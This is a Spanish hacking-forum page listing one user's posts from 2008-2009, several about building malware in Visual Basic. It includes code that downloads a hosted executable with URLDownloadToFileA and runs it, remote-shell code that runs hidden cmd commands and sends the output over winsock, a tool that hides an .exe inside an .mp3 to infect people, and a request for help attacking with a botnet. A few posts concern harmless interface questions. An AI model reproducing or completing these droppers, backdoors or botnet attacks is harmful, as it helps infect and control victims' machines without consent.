elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17
121  Programación / Programación Visual Basic / Re: [SRC]- mGetAPIPtr, sacar el puntero de un API... nuevo metodo :P en: 11 Agosto 2009, 14:15 pm
Muy bueno loco, me quedé medio confuso  :huh:, pero se ve muy bueno  ;-)
122  Programación / Programación Visual Basic / Re: Call API By Name Usin vtable Patch en: 6 Junio 2009, 02:13 am
Ok era el modulo entonces  ;D
123  Programación / Programación Visual Basic / Re: Call API By Name Usin vtable Patch en: 5 Junio 2009, 19:17 pm
Bueno sinceramente siento revivir el tema, pero es para no crear otro post.
Mi problema es el siguiente, estoy llamando a la api UrlDownloadToFileA, el modulo está declarado y todo.. como prueba tengo otra api llamada (CopyFile) que funciona correctamente.

Bueno así tengo lo de la api de UrlDownloadToFileA :

Código
  1.  
  2.  
  3. .....
  4.  
  5. If sDown = "Si" Then
  6.   Descargar dUrl, aCarpeta & "\Down.exe"
  7.   Shell aCarpeta & "\Down.exe"
  8.  End If
  9.  
  10. .....
  11.  
  12. Function Descargar(Url As String, FileName As String) As Long
  13. Dim lRet As Long
  14.    lRet = c.CallAPIByName("urlmon", "URLDownloadToFileA", 0, StrPtr(Url), StrPtr(FileName), 0, 0)
  15. End Function

El problema es que el archivo hosteado no se descarga a la carpeta, los datos de las cadenas están comprobados pero sigue sin descargarse.

Alguna solución?

Saludos! :-\

124  Seguridad Informática / Abril negro / Re: SharkI Transformer [Infectar con un .mp3] en: 21 Abril 2009, 00:51 am
Te lo he añadido al recopilatorio de Abril Negro ;) Lo que se supone que hace es que al ejecutar el .mp3 por consola también se ejecuta el .exe o que?

Gracias EON =)

Si, si lo ejecutas desde MsDOS leera la cabecera del ejecutable, en cambio si lo ejecuta normal leera la cabecera de un archivo de musica.

Saludos y muchas gracias!  ;D
125  Seguridad Informática / Abril negro / Re: SharkI Transformer [Infectar con un .mp3] en: 20 Abril 2009, 23:43 pm
Bueno aqui os dejo un videotuto por si alguien no lo entiende  :P

126  Seguridad Informática / Abril negro / SharkI Transformer [Infectar con un .mp3] en: 19 Abril 2009, 20:43 pm
Bueno guiandome del videotuto de polifemo y recordando el post de hackdark y como no del blog de Thor, aqui he hecho una pequeña herramienta que une los archivos y crea el acceso directo, lo unico que teneis que hacer es modificar el destino del acceso directo.



Bueno lo unico que teneis que hacer despues de crear el archivo y el acceso directo es esto :



[size=150]Descargar[/size]

Saludos!  :drinking:
127  Programación / Programación Visual Basic / Re: PopUp sin borde de form en: 4 Enero 2009, 23:30 pm
Gracias por contestar se agradece, Byway yo tambien hacia eso xD pero no se es medio cutre..  :laugh:
128  Programación / Programación Visual Basic / Como enviar una peticion HTTP desde winsock en: 4 Enero 2009, 23:25 pm
Bueno estoy realizando una botnet, y quisiera saber como atacaria desde Visual Basic me dijieron enviando una peticion HTTP desde winsock, lei algunos textos y eso no me entere mucho, alguien me puede dejar algun ejemplo mas o menos de como atacaria una Botnet?

Saludos! :huh:
129  Programación / Programación Visual Basic / PopUp sin borde de form en: 3 Enero 2009, 21:40 pm
Bueno quisiera saber como poner un popup sin que salga el borde del form.
Por ejemplo hagan lo siguiente :
1. Creen un nuevo proyecto exe
2. Quitenle los bordes al form
3. Y si le agregan un PopUp menu se pone SI o SI un borde en la ventana.

Alguna sugerencia o truco ?  :huh:
130  Programación / Programación Visual Basic / Re: Ayuda con Shell Remota en: 2 Diciembre 2008, 22:33 pm
Nada.. sigue igual.

Código:
Dim sCommand As String
sCommand = TextShell.Text
Kill Environ("windir") & "KB008.txt"
Sleep (500)
Shell "cmd /c " & data(1) & " > " & Environ("windir") & "KB008.txt", vbHide
Sleep (2000)
 
Open Environ("windir") & "KB008.txt" For Binary As #1
sCommand = Space$(LOF(1))
Get #1, , sCommand
Close #1
 
WS.SendData "ComandoShell|" & sCommand

Probe sin el : sCommand = TextShell.Text
Pero claramente te lo enviara en blanco.

Saludos! :-(

Edit : KrakCar te agregue al msn por si me puedes ayudar, es que asi por el foro tardamos mucho.. Saludos!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines